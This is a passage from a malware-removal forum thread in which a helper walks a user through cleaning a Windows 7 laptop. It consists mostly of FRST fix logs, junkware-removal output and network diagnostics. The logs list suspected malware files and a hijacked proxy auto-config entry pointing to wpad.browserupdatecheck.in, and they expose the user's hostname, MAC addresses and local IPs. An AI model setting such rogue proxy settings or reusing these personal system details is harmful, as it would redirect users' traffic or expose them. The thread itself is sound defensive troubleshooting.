"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{176A12CA-0E00-48F8-996E-4F5457FB4C20}" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\EssentialUpdateMachine" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Logon\{D7701A85-7F86-4B4C-9803-0FF2E2CB2B6E}" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{D7701A85-7F86-4B4C-9803-0FF2E2CB2B6E}" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Winupdate" => key removed successfully
C:\Windows\System32\Drivers\etc\hosts => moved successfully.
Hosts restored successfully.
 
========= RemoveProxy: =========
 
HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\\DefaultConnectionSettings => value removed successfully
HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\\SavedLegacySettings => value removed successfully
HKU\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\\DefaultConnectionSettings => value removed successfully
HKU\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\\SavedLegacySettings => value removed successfully
HKU\S-1-5-21-1038277221-3604561771-2240411101-1006\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\\DefaultConnectionSettings => value removed successfully
HKU\S-1-5-21-1038277221-3604561771-2240411101-1006\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\\SavedLegacySettings => value removed successfully
 
 
========= End of RemoveProxy: =========
 
 
=========  bitsadmin /reset /allusers =========
 
 
BITSADMIN version 3.0 [ 7.5.7601 ]
BITS administration utility.
© Copyright 2000-2006 Microsoft Corp.
 
BITSAdmin is deprecated and is not guaranteed to be available in future versions of Windows.
Administrative tools for the BITS service are now provided by BITS PowerShell cmdlets.
 
0 out of 0 jobs canceled.
 
========= End of CMD: =========
 
 
=========  netsh winsock reset catalog =========
 
 
Sucessfully reset the Winsock Catalog.
You must restart the computer in order to complete the reset.
 
 
========= End of CMD: =========
 
 
=========  ipconfig /flushdns =========
 
 
Windows IP Configuration
 
Successfully flushed the DNS Resolver Cache.
 
========= End of CMD: =========
 
EmptyTemp: => 3.4 GB temporary data Removed.
 
 
The system needed a reboot.. 
 
==== End of Fixlog 16:35:06 ====


#6 Mohasaiyan


Posted 08 June 2015 - 04:06 PM

Here is the log from my most recent scan. I hope it took care of the problems, but I cannot be sure.

 

# Option : Cleaning
 
***** [ Services ] *****
 
 
***** [ Files / Folders ] *****
 
 
***** [ Scheduled tasks ] *****
 
 
***** [ Shortcuts ] *****
 
 
***** [ Registry ] *****
 
Key Deleted : [x64] HKLM\SOFTWARE\Description
 
***** [ Web browsers ] *****
 
-\\ Internet Explorer v11.0.9600.17801
 
 
-\\ Mozilla Firefox v29.0.1 (en-US)
 
 
-\\ Google Chrome v43.0.2357.81
 
[C:\Users\dell 2\AppData\Local\Google\Chrome\User Data\Default\Web Data] - Deleted [Search Provider] : hxxp://search.aol.com/aol/search?q={searchTerms}
[C:\Users\dell 2\AppData\Local\Google\Chrome\User Data\Default\Web Data] - Deleted [Search Provider] : hxxp://astromenda.com/results.php?f=4&q={searchTerms}&a=ast_ir_14_49_ch&cd=2XzuyEtN2Y1L1QzutDtDtCzzyE0Dzz0EyE0CtCzztAyBzytAtN0D0Tzu0SzyyEyBtN1L2XzutBtFtBtCtFtCzztFtAtN1L1CzutCyEtBzytDyD1V1TtN1L1G1B1V1N2Y1L1Qzu2StAtC0C0AyC0B0DzztG0F0E0A0EtGzzyEyB0EtG0AzyzztCtGyE0Ezyzz0CzytCyC0AtB0CyC2QtN1M1F1B2Z1V1N2Y1L1Qzu2SyDzytC0FyC0A0EyCtG0F0F0EyBtGtAtA0DzytG0F0DyEyDtGyD0FyCyE0D0AyEyE0A0FyDyC2Q&cr=1600256073&ir=
[C:\Users\dell 2\AppData\Local\Google\Chrome\User Data\Default\Web Data] - Deleted [Search Provider] : hxxp://www.istart123.com/web/?type=ds&ts=1407182232&from=irs&uid=ST3250823AS_5ND0MS92XXXX5ND0MS92&q={searchTerms}
[C:\Users\dell 2\AppData\Local\Google\Chrome\User Data\Default\Web Data] - Deleted [Search Provider] : hxxp://websearch.ask.com/redirect?client=cr&src=kw&tb=ORJ&o=&locale=&apn_uid=F07291AA-9EF7-4A17-B334-AE977FE07341&apn_ptnrs=TV&apn_sauid=A04B0648-573A-4724-B0AB-11353C69D58F&apn_dtid=OSJ000YYUS&q={searchTerms}
[C:\Users\dell 2\AppData\Local\Google\Chrome\User Data\Default\Web Data] - Deleted [Search Provider] : hxxp://www.ask.com/web?q={searchTerms}
[C:\Users\dell 2\AppData\Local\Google\Chrome\User Data\Default\Web Data] - Deleted [Search Provider] : hxxp://nortonsafe.search.ask.com/web?q={searchTerms}&o=APN10506&l=dis&prt=360&chn=S1122&geo=JP&ver=21&locale=en_JP&gct=sb&qsrc=2869
[C:\Users\dell 2\AppData\Local\Google\Chrome\User Data\Default\Secure Preferences] - Deleted [Homepage] : 
[C:\Users\dell 2\AppData\Local\Google\Chrome\User Data\Default\Secure Preferences] - Deleted [Startup_URLs] : 706B37E4F71A5D8A6C7872CE508DBCC110B81E67F8B90E1F37038BE65BD788BD"},"software_reporter":{"prompt_reason":"D68877DB3EF4BFB848CA20D38BB140C740E68C26218EE750180121EBF66A615F","prompt_seed":"A92B2D4AAB643DC70BDD026ED6AB3177640758E6214C16318F91707FB7C00FDA","prompt_version":"28042A40D8803BB919288337A19007DB0D43896ABD0FDB202B51377B5D5D5AAE"},"sync":{"remaining_rollback_tries":"CBDBA8D7EEF06C28B45A64EBE998A75F2CED89CDCF961FC0E110BF6F5C20DF43"}},"super_mac":"2A92E1716176EA7D4D00F4D5753839F720003C381268B7BE2C2444D4E614E17B"},"session":{"restore_on_startup":5,"startup_urls":["hxxp://www.youtube.com/","hxxp://www.google.com/","hxxp://www.istart123.com/?type=hp&ts=1407182232&from=irs&uid=ST3250823AS_5ND0MS92XXXX5ND0MS92
 
-\\ Chromium v
 
 
*************************


#7 B-boy/StyLe/


Posted 08 June 2015 - 04:33 PM

Please don't run any tools unless requested!

We are not done yet!

Let me see the current logs and reply back with instructions!




#8 B-boy/StyLe/


Posted 08 June 2015 - 04:42 PM

Ok, now please download the following file => [attachment=165842:fixlist.txt] and save it to the Desktop.
NOTE: It's important that both files, FRST and fixlist.txt, are in the same location or the fix will not work.

Run FRST and press the Fix button just once and wait.
The tool will make a log on the Desktop (Fixlog.txt). Please post it to your reply.

Let me know if Chrome's issues remain.

 

 

Regards,

Georgi




#9 Mohasaiyan


Posted 08 June 2015 - 06:18 PM

Newest scan results boss.
 
Fix result of Farbar Recovery Scan Tool (x64) Version:08-06-2015
Ran by dell 2 at 2015-06-08 18:06:13 Run:2
Running from C:\Users\dell 2\Downloads
Loaded Profiles: dell 2 & MSSQL$SQLEXPRESS (Available Profiles: dell 2 & MSSQL$SQLEXPRESS & Classic .NET AppPool & localhost & DefaultAppPool)
Boot Mode: Normal
==============================================
 
fixlist content:
*****************
start
CreateRestorePoint:
CloseProcesses:
cmd: type "C:\Users\dell 2\Desktop\JRT.txt"
cmd: type "C:\Users\dell 2\Downloads\software_removal_tool.log"
cmd: type "C:\Users\dell 2\Desktop\Result.txt"
2015-05-31 19:32 - 2015-04-25 05:18 - 00295424 _____ (Groom-A-Zebu ™ ) C:\Windows\system32\ysxja.exe
2015-05-31 19:32 - 2015-04-25 05:18 - 00295424 _____ (Groom-A-Zebu ™ ) C:\Windows\cygavb.exe
2015-05-31 19:32 - 2015-04-25 05:18 - 00053248 _____ C:\Windows\zlib.dll
2015-05-31 19:32 - 2013-12-05 07:36 - 00003542 _____ C:\Windows\mstdcvtr.bat
2015-05-31 19:32 - 2013-06-05 08:38 - 00004122 _____ C:\Windows\plofgye
2015-05-31 19:32 - 2013-06-05 08:37 - 00004194 _____ C:\Windows\soxe
2015-05-31 19:32 - 2013-06-05 08:36 - 00000038 _____ C:\Windows\initcvtr.bat
2015-05-31 19:32 - 2013-01-06 07:43 - 00000074 _____ C:\Windows\system32\Drivers\healusb.sys
2015-05-31 19:32 - 2013-01-06 07:43 - 00000074 _____ C:\Windows\system32\cygwin.sys
2015-05-31 19:32 - 2012-12-17 07:45 - 00018559 _____ C:\Windows\default.cfg
2015-05-31 19:32 - 2012-07-09 11:02 - 00279552 _____ (Eric Lawrence) C:\Windows\FiddlerCore4.dll
cmd: chkdsk c: |find /v "percent" >> "%userprofile%\desktop\checkhd.txt"
cmd: type "C:\Users\dell 2\Desktop\checkhd.txt"
Hosts:
RemoveProxy:
cmd: netsh winsock reset catalog
cmd: ipconfig /flushdns
EmptyTemp:
End
*****************
 
Restore point was successfully created.
Processes closed successfully.
 
=========  type "C:\Users\dell 2\Desktop\JRT.txt" =========
 
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Junkware Removal Tool (JRT) by Thisisu
Version: 6.9.0 (06.07.2015:1)
OS: Windows 7 Professional x64
Ran by dell 2 on 2015/06/08 at  3:30:43.51
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
 
 
 
 
~~~ Services
 
 
 
~~~ Tasks
 
 
 
~~~ Registry Values
 
 
 
~~~ Registry Keys
 
 
 
~~~ Files
 
 
 
~~~ Folders
 
 
 
~~~ Chrome
 
 
[C:\Users\dell 2\appdata\local\Google\Chrome\User Data\Default\Preferences] - default search provider reset
 
[C:\Users\dell 2\appdata\local\Google\Chrome\User Data\Default\Preferences] - Extensions Deleted:
 
[C:\Users\dell 2\appdata\local\Google\Chrome\User Data\Default\Secure Preferences] - default search provider reset
 
[C:\Users\dell 2\appdata\local\Google\Chrome\User Data\Default\Secure Preferences] - Extensions Deleted:
[]
 
 
 
 
 
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Scan was completed on 2015/06/08 at  3:36:12.28
End of JRT log
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
 
========= End of CMD: =========
 
 
=========  type "C:\Users\dell 2\Downloads\software_removal_tool.log" =========
 
[0606/002652:INFO:scoped_logging.cc(50)] Starting logs for version: 3.22.0
[0606/002652:INFO:crash_client.cc(273)] GoogleCrashHandler could not be reached.
[0606/002652:INFO:chrome_cleaner_main.cc(235)] Crash reporting is not available.
[0606/002652:ERROR:chrome_cleaner_main.cc(251)] Failed to save ZoneIdentifier, 80070057: The specified procedure could not be found. (0x7F)
[0606/002652:ERROR:restart_manager_wrapper.cc(87)] RmStartSession failed.: The operation completed successfully. (0x0)
[0606/002652:INFO:recovery_component.cc(208)] Sent request to download Recovery Component.
[0606/002653:INFO:chrome_util.cc(288)] Using Old version field from registry. Update in progress?
[0606/002653:INFO:chrome_profile_reset_component.cc(95)] Found Compatible Chrome version: 43.0.2357.81
[0606/002653:ERROR:task_scheduler.cc(1062)] RegisterTaskDefinition failed. 80041315: The operation completed successfully. (0x0)
[0606/002653:ERROR:pending_logs_service.cc(87)] Failed to register logs upload retry task.
[0606/002653:INFO:recovery_component.cc(172)] Recovery Component successfully downloaded.
[0606/002702:INFO:recovery_component.cc(143)] ChromeRecovery returned code: 1
[0606/002702:INFO:chrome_util.cc(288)] Using Old version field from registry. Update in progress?
[0606/002702:INFO:chrome_profile_reset_component.cc(95)] Found Compatible Chrome version: 43.0.2357.81
[0606/002702:INFO:chrome_profile_reset_component.cc(77)] Found C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
[0606/002704:INFO:system_report_component.cc(231)] Registry 'HKLM\software\microsoft\windows\currentversion\run\PWRISOVM.EXE' = 'C:\Program Files\PowerISO\PWRISOVM.EXE -startup'.
[0606/002704:INFO:system_report_component.cc(231)] Registry 'HKCU\software\microsoft\windows\currentversion\run\Skype' = '"C:\Program Files (x86)\Skype\Phone\Skype.exe" /minimized /regrun'.
[0606/002704:INFO:system_report_component.cc(231)] Registry 'HKCU\software\microsoft\windows\currentversion\run\Battle.net' = '"C:\Program Files (x86)\Battle.net\Battle.net Launcher.exe" --autostarted'.
[0606/002704:INFO:system_report_component.cc(231)] Registry 'HKCU\software\microsoft\windows\currentversion\run\Steam' = '"C:\Program Files (x86)\Steam\Steam.exe" -silent'.
[0606/002704:INFO:system_report_component.cc(231)] Registry 'HKCU\software\microsoft\windows\currentversion\run\AdobeBridge' = ''.
[0606/002704:INFO:system_report_component.cc(231)] Registry 'HKCU\software\microsoft\windows\currentversion\runonce\Report' = 'C:\AdwCleaner\AdwCleaner[S4].txt'.
[0606/002704:INFO:system_report_component.cc(255)] Registry 'HKLM\system\currentcontrolset\control\session manager\bootexecute' = 'autocheck autochk *'.
[0606/002704:INFO:system_report_component.cc(483)] Chrome installation detected: 'C:\Program Files (x86)\google\chrome\application\43.0.2357.81'.
[0606/002705:INFO:system_report_component.cc(509)] LSP: {9D60A9E0-337A-11D0-BD88-0000C082E69A} = '%SystemRoot%\system32\mswsock.dll'.
[0606/002705:INFO:system_report_component.cc(509)] LSP: {9FC48064-7298-43E4-B7BD-181F2089792A} = '%SystemRoot%\system32\mswsock.dll'.
[0606/002705:INFO:system_report_component.cc(509)] LSP: {E70F1AA0-AB8B-11CF-8CA3-00805F48A192} = '%SystemRoot%\system32\mswsock.dll'.
[0606/002705:INFO:system_report_component.cc(509)] LSP: {F9EAB0C0-26D4-11D0-BBBF-00AA006C34E4} = '%SystemRoot%\system32\mswsock.dll'.
[0606/002705:INFO:system_report_component.cc(231)] Registry 'HKCU\software\microsoft\windows\currentversion\internet settings\ProxyEnable' = '00000000'.
[0606/002705:INFO:system_report_component.cc(231)] Registry 'HKCU\software\microsoft\windows\currentversion\internet settings\SyncMode5' = '00000004'.
[0606/002705:INFO:system_report_component.cc(231)] Registry 'HKCU\software\microsoft\windows\currentversion\internet settings\SpecialFoldersCacheSize' = '00000008'.
[0606/002705:INFO:system_report_component.cc(231)] Registry 'HKCU\software\microsoft\windows\currentversion\internet settings\SecurityIdIUriCacheSize' = '0000001e'.
[0606/002705:INFO:system_report_component.cc(231)] Registry 'HKCU\software\microsoft\windows\currentversion\internet settings\CoInternetCombineIUriCacheSize' = '00000050'.
[0606/002705:INFO:system_report_component.cc(231)] Registry 'HKCU\software\microsoft\windows\currentversion\internet settings\CreateUriCacheSize' = '00000050'.
[0606/002705:INFO:system_report_component.cc(231)] Registry 'HKCU\software\microsoft\windows\currentversion\internet settings\ShowPunycode' = '00000000'.
[0606/002705:INFO:system_report_component.cc(231)] Registry 'HKCU\software\microsoft\windows\currentversion\internet settings\EnablePunycode' = '00000001'.
[0606/002705:INFO:system_report_component.cc(231)] Registry 'HKCU\software\microsoft\windows\currentversion\internet settings\EnableSSL3Fallback' = '00000001'.
[0606/002705:INFO:system_report_component.cc(231)] Registry 'HKCU\software\microsoft\windows\currentversion\internet settings\BackgroundConnections' = '00000001'.
[0606/002705:INFO:system_report_component.cc(231)] Registry 'HKCU\software\microsoft\windows\currentversion\internet settings\EnableSPDY3_0' = '00000000'.
[0606/002705:INFO:system_report_component.cc(231)] Registry 'HKCU\software\microsoft\windows\currentversion\internet settings\ProxyHttp1.1' = '00000001'.
[0606/002705:INFO:system_report_component.cc(231)] Registry 'HKCU\software\microsoft\windows\currentversion\internet settings\NoNetAutodial' = '00000000'.
[0606/002705:INFO:system_report_component.cc(231)] Registry 'HKCU\software\microsoft\windows\currentversion\internet settings\EnableAutodial' = '00000000'.
[0606/002705:INFO:system_report_component.cc(231)] Registry 'HKCU\software\microsoft\windows\currentversion\internet settings\GlobalUserOffline' = '00000000'.
[0606/002705:INFO:system_report_component.cc(231)] Registry 'HKCU\software\microsoft\windows\currentversion\internet settings\MigrateProxy' = '00000001'.
[0606/002705:INFO:system_report_component.cc(231)] Registry 'HKCU\software\microsoft\windows\currentversion\internet settings\EnableNegotiate' = '00000001'.
[0606/002705:INFO:system_report_component.cc(231)] Registry 'HKCU\software\microsoft\windows\currentversion\internet settings\CertificateRevocation' = '00000001'.
[0606/002705:INFO:system_report_component.cc(231)] Registry 'HKCU\software\microsoft\windows\currentversion\internet settings\WarnonZoneCrossing' = '00000000'.
[0606/002705:INFO:system_report_component.cc(231)] Registry 'HKCU\software\microsoft\windows\currentversion\internet settings\DisableCachingOfSSLPages' = '00000000'.
[0606/002705:INFO:system_report_component.cc(231)] Registry 'HKCU\software\microsoft\windows\currentversion\internet settings\ZonesSecurityUpgrade' = '6E22C957E1EACE01'.
[0606/002705:INFO:system_report_component.cc(231)] Registry 'HKCU\software\microsoft\windows\currentversion\internet settings\PrivacyAdvanced' = '00000000'.
[0606/002705:INFO:system_report_component.cc(231)] Registry 'HKCU\software\microsoft\windows\currentversion\internet settings\SecureProtocols' = '00000a80'.
[0606/002705:INFO:system_report_component.cc(231)] Registry 'HKCU\software\microsoft\windows\currentversion\internet settings\UrlEncoding' = '00000000'.
[0606/002705:INFO:system_report_component.cc(231)] Registry 'HKCU\software\microsoft\windows\currentversion\internet settings\WarnOnPost' = '01000000'.
[0606/002705:INFO:system_report_component.cc(231)] Registry 'HKCU\software\microsoft\windows\currentversion\internet settings\UseSchannelDirectly' = '01000000'.
[0606/002705:INFO:system_report_component.cc(231)] Registry 'HKCU\software\microsoft\windows\currentversion\internet settings\AutoConfigProxy' = 'wininet.dll'.
[0606/002705:INFO:system_report_component.cc(231)] Registry 'HKCU\software\microsoft\windows\currentversion\internet settings\MimeExclusionListForCache' = 'multipart/mixed multipart/x-mixed-replace multipart/x-byteranges '.
[0606/002705:INFO:system_report_component.cc(231)] Registry 'HKCU\software\microsoft\windows\currentversion\internet settings\WarnOnIntranet' = '00000001'.
[0606/002705:INFO:system_report_component.cc(231)] Registry 'HKCU\software\microsoft\windows\currentversion\internet settings\EnableHttp1_1' = '00000001'.
[0606/002705:INFO:system_report_component.cc(231)] Registry 'HKCU\software\microsoft\windows\currentversion\internet settings\PrivDiscUiShown' = '00000001'.
[0606/002705:INFO:system_report_component.cc(231)] Registry 'HKCU\software\microsoft\windows\currentversion\internet settings\EmailName' = 'IEUser@'.
[0606/002705:INFO:system_report_component.cc(231)] Registry 'HKCU\software\microsoft\windows\currentversion\internet settings\User Agent' = 'Mozilla/4.0 (compatible; MSIE 8.0; Win32)'.
[0606/002705:INFO:system_report_component.cc(231)] Registry 'HKCU\software\microsoft\windows\currentversion\internet settings\IE5_UA_Backup_Flag' = '5.0'.
[0606/002705:INFO:system_report_component.cc(231)] Registry 'HKCU\software\microsoft\windows\currentversion\internet settings\connections\SavedLegacySettings
[0606/002705:INFO:system_report_component.cc(231)] Registry 'HKCU\software\microsoft\windows\currentversion\internet settings\connections\DefaultConnectionSettings' = '460000004C00000001000000000000000000000000000000010000002A000000687474703A2F2F777061642E62726F77736572757064617465636865636B2E696E2F777061642E64617400000000000000000000000000000000000000000300000002000000C0A84B0100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000002000000C0A85D0100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000002000000C0A80104000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000'.
[0606/002705:INFO:system_report_component.cc(231)] Registry 'HKCU\software\microsoft\windows\currentversion\internet settings\connections\' = '09'.
[0606/002705:INFO:system_report_component.cc(231)] Registry 'HKCU\software\microsoft\windows\currentversion\internet settings\connections\Redcloud' = '460000000700000009000000000000000B0000003C2D6C6F6F706261636B3E000000000000000000000000000000000000000000000000000000000000000000000000'.
[0606/002705:INFO:system_report_component.cc(621)] WinINET Proxy settings: config='' bypass='' autoconfig='' .
[0606/002705:INFO:system_report_component.cc(658)] WinHTTP Proxy settings: no proxy config='' bypass=''.
[0606/002705:WARNING:system_report_component.cc(515)] ReportSecurityInformation.
[0606/002705:INFO:system_report_component.cc(580)] Antivirus: Microsoft Security Essentials
[0606/002705:ERROR:task_scheduler.cc(1062)] RegisterTaskDefinition failed. 80041315: The operation completed successfully. (0x0)
[0606/002705:ERROR:pending_logs_service.cc(87)] Failed to register logs upload retry task.
[0606/002705:INFO:safe_browsing_reporter.cc(129)] OnURLFetchUploadProgress(39136/39136).
[0606/002705:INFO:safe_browsing_reporter.cc(212)] Calling done_callback_ with result: 0
[0606/002705:ERROR:restart_manager_wrapper.cc(94)] kRmEndSession failed.: The operation completed successfully. (0x0)
[0606/002705:INFO:chrome_cleaner_main.cc(360)] Exiting with code: 2
[0606/002705:WARNING:logging_service.cc(111)] At least the last 6 log lines have not been uploaded to Safe Browsing.
 
========= End of CMD: =========
 
 
=========  type "C:\Users\dell 2\Desktop\Result.txt" =========
 
MiniToolBox by Farbar  Version: 11-05-2015 01
Ran by dell 2 (administrator) on 05-06-2015 at 23:30:12
Running from "C:\Users\dell 2\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\2VZ4Y9Y8"
Microsoft Windows 7 Professional  Service Pack 1 (X64)
Model: Latitude E5520 Manufacturer: Dell Inc.
Boot Mode: Normal
***************************************************************************
 
========================= Flush DNS: ===================================
 
Windows IP Configuration
 
Successfully flushed the DNS Resolver Cache.
 
========================= IE Proxy Settings: ============================== 
 
Proxy is not enabled.
No Proxy Server is set.
 
"Reset IE Proxy Settings": IE Proxy Settings were reset.
 
========================= FF Proxy Settings: ============================== 
 
 
"Reset FF Proxy Settings": Firefox Proxy settings were reset.
 
========================= Hosts content: =================================
 
 
 
========================= IP Configuration: ================================
 
Intel® Centrino® Ultimate-N 6300 AGN = Wireless Network Connection (Connected)
VMware Virtual Ethernet Adapter for VMnet1 = VMware Network Adapter VMnet1 (Connected)
VMware Virtual Ethernet Adapter for VMnet8 = VMware Network Adapter VMnet8 (Connected)
Broadcom NetXtreme 57xx Gigabit Controller = Local Area Connection (Media disconnected)
Microsoft Virtual WiFi Miniport Adapter = Wireless Network Connection 2 (Media disconnected)
 
 
# ----------------------------------
# IPv4 Configuration
# ----------------------------------
pushd interface ipv4
 
reset
set global icmpredirects=enabled
add address name="VMware Network Adapter VMnet1" address=192.168.75.1 mask=255.255.255.0
add address name="VMware Network Adapter VMnet8" address=192.168.93.1 mask=255.255.255.0
 
 
popd
# End of IPv4 configuration
 
 
 
Windows IP Configuration
 
   Host Name . . . . . . . . . . . . : Seville
   Primary Dns Suffix  . . . . . . . : 
   Node Type . . . . . . . . . . . . : Hybrid
   IP Routing Enabled. . . . . . . . : No
   WINS Proxy Enabled. . . . . . . . : No
   DNS Suffix Search List. . . . . . : browserupdatecheck.in
 
Ethernet adapter Local Area Connection* 13:
 
   Media State . . . . . . . . . . . : Media disconnected
   Connection-specific DNS Suffix  . : 
   Description . . . . . . . . . . . : Juniper Network Connect Virtual Adapter
   Physical Address. . . . . . . . . : 00-FF-B0-9B-4D-04
   DHCP Enabled. . . . . . . . . . . : Yes
   Autoconfiguration Enabled . . . . : Yes
 
Wireless LAN adapter Wireless Network Connection 2:
 
   Media State . . . . . . . . . . . : Media disconnected
   Connection-specific DNS Suffix  . : 
   Description . . . . . . . . . . . : Microsoft Virtual WiFi Miniport Adapter
   Physical Address. . . . . . . . . : 00-24-D7-C9-88-11
   DHCP Enabled. . . . . . . . . . . : Yes
   Autoconfiguration Enabled . . . . : Yes
 
Wireless LAN adapter Wireless Network Connection:
 
   Connection-specific DNS Suffix  . : 
   Description . . . . . . . . . . . : Intel® Centrino® Ultimate-N 6300 AGN
   Physical Address. . . . . . . . . : 00-24-D7-C9-88-10
   DHCP Enabled. . . . . . . . . . . : Yes
   Autoconfiguration Enabled . . . . : Yes
   Link-local IPv6 Address . . . . . : fe80::5dc4:d591:1fbf:3eb0%14(Preferred) 
   IPv4 Address. . . . . . . . . . . : 192.168.1.4(Preferred) 
   Subnet Mask . . . . . . . . . . . : 255.255.255.0
   Lease Obtained. . . . . . . . . . : 2015年6月5日 21:57:59
   Lease Expires . . . . . . . . . . : 2015年6月6日 21:57:58
   Default Gateway . . . . . . . . . : 192.168.1.1
   DHCP Server . . . . . . . . . . . : 192.168.1.1
   DHCPv6 IAID . . . . . . . . . . . : 184558807
   DHCPv6 Client DUID. . . . . . . . : 00-01-00-01-15-8A-76-2F-D0-67-E5-2D-DA-85
   DNS Servers . . . . . . . . . . . : 192.168.1.1
   NetBIOS over Tcpip. . . . . . . . : Enabled
 
Ethernet adapter Local Area Connection:
 
   Media State . . . . . . . . . . . : Media disconnected
   Connection-specific DNS Suffix  . : hsd1.mi.comcast.net.
   Description . . . . . . . . . . . : Broadcom NetXtreme 57xx Gigabit Controller
   Physical Address. . . . . . . . . : D0-67-E5-2D-DA-85
   DHCP Enabled. . . . . . . . . . . : Yes
   Autoconfiguration Enabled . . . . : Yes
 
Ethernet adapter VMware Network Adapter VMnet1:
 
   Connection-specific DNS Suffix  . : 
   Description . . . . . . . . . . . : VMware Virtual Ethernet Adapter for VMnet1
   Physical Address. . . . . . . . . : 00-50-56-C0-00-01
   DHCP Enabled. . . . . . . . . . . : No
   Autoconfiguration Enabled . . . . : Yes
   Link-local IPv6 Address . . . . . : fe80::e9:ff48:ac8b:d8e1%17(Preferred) 
   IPv4 Address. . . . . . . . . . . : 192.168.75.1(Preferred) 
   Subnet Mask . . . . . . . . . . . : 255.255.255.0
   Default Gateway . . . . . . . . . : 
   DHCPv6 IAID . . . . . . . . . . . : 704663638
   DHCPv6 Client DUID. . . . . . . . : 00-01-00-01-15-8A-76-2F-D0-67-E5-2D-DA-85
   DNS Servers . . . . . . . . . . . : fec0:0:0:ffff::1%1
                                       fec0:0:0:ffff::2%1
                                       fec0:0:0:ffff::3%1
   NetBIOS over Tcpip. . . . . . . . : Enabled
 
Ethernet adapter VMware Network Adapter VMnet8:
 
   Connection-specific DNS Suffix  . : 
   Description . . . . . . . . . . . : VMware Virtual Ethernet Adapter for VMnet8
   Physical Address. . . . . . . . . : 00-50-56-C0-00-08
   DHCP Enabled. . . . . . . . . . . : No
   Autoconfiguration Enabled . . . . : Yes
   Link-local IPv6 Address . . . . . : fe80::e0ba:c7ad:6de2:85ae%18(Preferred) 
   IPv4 Address. . . . . . . . . . . : 192.168.93.1(Preferred) 
   Subnet Mask . . . . . . . . . . . : 255.255.255.0
   Default Gateway . . . . . . . . . : 
   DHCPv6 IAID . . . . . . . . . . . : 721440854
   DHCPv6 Client DUID. . . . . . . . : 00-01-00-01-15-8A-76-2F-D0-67-E5-2D-DA-85
   DNS Servers . . . . . . . . . . . : fec0:0:0:ffff::1%1
                                       fec0:0:0:ffff::2%1
                                       fec0:0:0:ffff::3%1
   NetBIOS over Tcpip. . . . . . . . : Enabled
Server:  UnKnown
Address:  192.168.1.1
 
Name:    google.com
Addresses:  2607:f8b0:4009:80a::200e
 216.58.216.238
 
 
Pinging google.com [216.58.216.206] with 32 bytes of data:
Reply from 216.58.216.206: bytes=32 time=24ms TTL=54
Reply from 216.58.216.206: bytes=32 time=23ms TTL=54
 
Ping statistics for 216.58.216.206:
    Packets: Sent = 2, Received = 2, Lost = 0 (0% loss),
Approximate round trip times in milli-seconds:
    Minimum = 23ms, Maximum = 24ms, Average = 23ms
Server:  UnKnown
Address:  192.168.1.1
 
Name:    yahoo.com
Addresses:  98.139.183.24
 98.138.253.109
 206.190.36.45
 
 
Pinging yahoo.com [98.138.253.109] with 32 bytes of data:
Reply from 98.138.253.109: bytes=32 time=48ms TTL=50
Reply from 98.138.253.109: bytes=32 time=48ms TTL=50
 
Ping statistics for 98.138.253.109:
    Packets: Sent = 2, Received = 2, Lost = 0 (0% loss),
Approximate round trip times in milli-seconds:
    Minimum = 48ms, Maximum = 48ms, Average = 48ms
 
Pinging 127.0.0.1 with 32 bytes of data:
Reply from 127.0.0.1: bytes=32 time<1ms TTL=128
Reply from 127.0.0.1: bytes=32 time<1ms TTL=128
 
Ping statistics for 127.0.0.1:
    Packets: Sent = 2, Received = 2, Lost = 0 (0% loss),
Approximate round trip times in milli-seconds:
    Minimum = 0ms, Maximum = 0ms, Average = 0ms
===========================================================================
Interface List
 21...00 ff b0 9b 4d 04 ......Juniper Network Connect Virtual Adapter
 16...00 24 d7 c9 88 11 ......Microsoft Virtual WiFi Miniport Adapter
 14...00 24 d7 c9 88 10 ......Intel® Centrino® Ultimate-N 6300 AGN
 11...d0 67 e5 2d da 85 ......Broadcom NetXtreme 57xx Gigabit Controller
 17...00 50 56 c0 00 01 ......VMware Virtual Ethernet Adapter for VMnet1
 18...00 50 56 c0 00 08 ......VMware Virtual Ethernet Adapter for VMnet8
  1...........................Software Loopback Interface 1
===========================================================================
 
IPv4 Route Table
===========================================================================
Active Routes:
Network Destination        Netmask          Gateway       Interface  Metric
          0.0.0.0          0.0.0.0      192.168.1.1      192.168.1.4     25
        127.0.0.0        255.0.0.0         On-link         127.0.0.1    306
        127.0.0.1  255.255.255.255         On-link         127.0.0.1    306
  127.255.255.255  255.255.255.255         On-link         127.0.0.1    306
      192.168.1.0    255.255.255.0         On-link       192.168.1.4    281
      192.168.1.4  255.255.255.255         On-link       192.168.1.4    281
    192.168.1.255  255.255.255.255         On-link       192.168.1.4    281
     192.168.75.0    255.255.255.0         On-link      192.168.75.1    276
